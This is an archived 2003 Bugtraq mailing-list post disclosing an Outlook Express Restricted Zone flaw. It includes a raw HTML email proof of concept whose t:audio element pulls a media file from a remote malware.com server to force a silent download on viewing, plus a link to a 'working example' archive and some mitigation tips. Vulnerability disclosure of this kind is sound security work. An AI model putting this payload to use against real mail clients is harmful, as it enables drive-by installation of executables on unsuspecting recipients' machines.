lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200305211155.h4LBtYrp029829@web179.megawebservers.com>
Date: Wed, 21 May 2003 11:55:34 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>, <NTBugtraq@...tserv.ntbugtraq.com>
Subject: Restricted Zone: the OUTLOOK EXPRESS




Tuesday, 20 May, 2003


Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 
post.

This can be achieved with the default setting of Outlook Express: 
RESTRICTED ZONE.

Technically the following never worked, cannot work, shouldn't work. 
But it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com 

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf"  />
</body></html>

What that does is invoke our freakish media file including our trusty 
and battle-hardened 0s URL flip from within the html of an email or 
newsgroup post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail, 
modified third-party files [whatever that means] function according 
to plan. Specifically audio + *.asf. Our 0s URL flip points to our 
file on the remote server and automatically forces our download as 
instructed. Couple that with the most recent flood-like functionality 
of the iframe: http://www.securityfocus.com/archive/1/321662 and 
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

First Step Working Example:

http://www.malware.com/but.its.free.zip


Notes:

1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora 
WebBrowser Control Embedded Media Player File Vulnerability ': 
http://www.securityfocus.com/bid/4343 which appears to never have 
been patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from 
untrustworthy sources


End Call


-- 
http://www.malware.com





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ